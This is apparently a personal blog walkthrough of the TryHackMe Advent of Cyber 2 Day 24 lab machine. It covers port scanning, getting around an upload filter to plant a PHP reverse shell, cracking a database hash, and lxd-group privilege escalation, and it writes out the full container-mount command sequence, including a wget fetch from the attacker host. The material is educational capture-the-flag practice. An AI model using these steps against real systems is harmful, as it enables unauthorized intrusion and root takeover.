TryHackMe — Advent of Cyber 2 — Day 24
Good afternoon,
After a few day hiatus from studying for other works things, I’m back and going to finish up this Advent Calendar.
This last challenge/machine looks like it goes from nmap to enumeration, exploitation, privesc and full root access. Should be a fun machine, for now I’m going to avoid any and all hints to include the questions (should be able to answer down the road once I get full access). Anyhow, Today’s intro:
“It was the night before Christmas and The Best Festival Company could finally rest. All of the toys had been made and the company had recovered from attack after attack. Everything was in Santa’s hands now, leaving the elves to do little more than wish him a safe journey ahead. Elf McEager sat at his terminal staring absentmindedly at light snow that had begun to fall. Just as he had drifted off to sleep Elf McEager was jolted to attention as a small parcel appeared just at the edge of his view.
The present was wrapped in a deep blue velvet that appeared to shimmer in and out of the firelight, not unlike a blinking terminal prompt. Carefully, Elf McEager reached for the azure ribbon, untying it slowly so as to not damage it. The velvet slowly fell away, revealing a small NUC computer with a letter on top. Unfolding the letter, Elf McEager read it aloud:
“Elf McEager — your boundless effort to save Christmas this year has not gone unnoticed. I wanted to reward you with a special present, however, there’s a catch. Elf McSkidy and I have seen your skills advance and we feel it would only be appropriate to give you a present after one last challenge. Inside this package, you’ll have also found a computer. Plug this into the network and hack into it. Best of luck and Merry Christmas — Santa”
Without delay, Elf McEager connected the NUC appropriately and watched it whir to life. A small screen nearby the power button blinked and then displayed the IP address assigned to the device. Next to the IP, a small symbol appeared. McEager quietly wondered to himself what it could mean as he logged into his terminal, ready to start his final challenge.”
First let’s start off with an nmap.
root@kali:/mnt/hgfs/shared_folder/tryhackme# nmap -sV -sC 10.10.50.55
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-28 12:55 EET
Nmap scan report for 10.10.50.55
Host is up (0.15s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
65000/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Light CycleService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.43 seconds
So we get a standard HTTP port and also another what is probably a hidden port at 65000. Let’s take a quick look at that one while we run a gobuster on that port first (since it takes a while on my internet).
root@kali:/mnt/hgfs/shared_folder/tryhackme# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://10.10.50.55:65000/ -x php -e -t 5
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.50.55:65000/
[+] Threads: 5
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/12/28 13:31:06 Starting gobuster
===============================================================
http://10.10.50.55:65000/index.php (Status: 200)
http://10.10.50.55:65000/uploads.php (Status: 200)
http://10.10.50.55:65000/assets (Status: 301)
http://10.10.50.55:65000/api (Status: 301)
http://10.10.50.55:65000/grid (Status: 301)Right away, we get an uploads.php page. I had a ton of connection request errors due to my internet slacking so let’s hope this works.. Let’s just upload a small text file and see if we can find it. We get an invalid file type (looks like it only like .png and .jpg/.jpeg), so let’s try and just upload a normal image and see where it goes. We’ve gotten a few hits on gobuster we can try to find it.
While looking through the source code of the upload page and getting invalid file format for real jpg images, we find a filter.js file.
onst filter = file => {
if(["image/png", "image/jpeg", "image/jpg"].indexOf(file.type) < 0){
return false;
} else if (["png", "jpeg", "jpg"].indexOf(file.name.split(".").pop()) < 0){
return false;
}//Let's be honest -- these things are dangerous. May as well always return false ¯\_(ツ)_/¯
return false;}
This is always returning false, so if we can negate this file, we should be ok. Now I did have to look at the walkthrough portion to see how to accomplish this on Burp. After testing a reverse shell locally written in php, we can try and upload this script.
We can remove the filter.js portion of the source code through Burp. 
We can also confirm this if we view the source code of the uploads.php when we get the page back to Firefox.
We still needed to have the bypass extension the file as the upload section in the input still only allows for those 3 file types.
Well that still didn’t work, re-tested in a different way, we can leave that code in the source code but when the request comes in to forward that file in Burp we can drop that file. Now, lets test it out. I removed the .php portion of the file and uploaded through burp, received a success message and we can confirm the file uploads to /grid.
And we now have success. I had the file extensions reversed. I needed .jpg.php not .php.jpg. Simple mistake but lets move forward.
Anyhow, that reverse shell didn’t work. So I used one from pentestmonkey. We now have a shell as www-data and can move forward finally..
When we take a look through the www directory, we find this gem.
We also find a rickroll.mp4. nice. If we look in that directory it seems to just be a placement for the creator of the machine. But looking back we find this dbauth.php file we can look at.
And we get some creds for the database on the machine it seems.
Once we get into the database we find some more creds for flynn that we can probably(hopefully) hit with john to see if we can escalate.
Hash-identifier is showing this most likely to be MD5.
Using John, single rules, rockyou.txt and Raw-MD5, we get a hit extremely quickly.
and we are in..
checking with sudo -l we have no sudo rights but we do have that lxd group we might be able to use. From here we can follow this article: https://www.hackingarticles.in/lxd-privilege-escalation/
Do this on the local machine: git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python3 -m http.server 80move to the remote machine: wget http://10.8.137.78/alpine-v3.12-x86_64-20201228_1459.tar.gz
lxc launch ubuntu:18.04
lxc image import ./alpine-v3.12-x86_64-20201228_1459.tar.gz --alias myimage
lxc image list (verify the myimage is there)
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
Now we have a root shell and we need to finish our commands: cd /mnt/root/root
Well, as always, I’ll leave that last flag for you. This was a fun machine, I for sure learned a few things and had a good time.
Throughout this Advent of Cyber 2 room, I learned a ton of things and had a good refresher on a few others. I want to thank all of those involved with creating this challenge and putting in the hard work for all of us trying to learn this skill.
As always, best of luck. If you enjoy my content, feel free to add me on LinkedIn and let me know you saw the blog.
Until next time,
-3lduderino
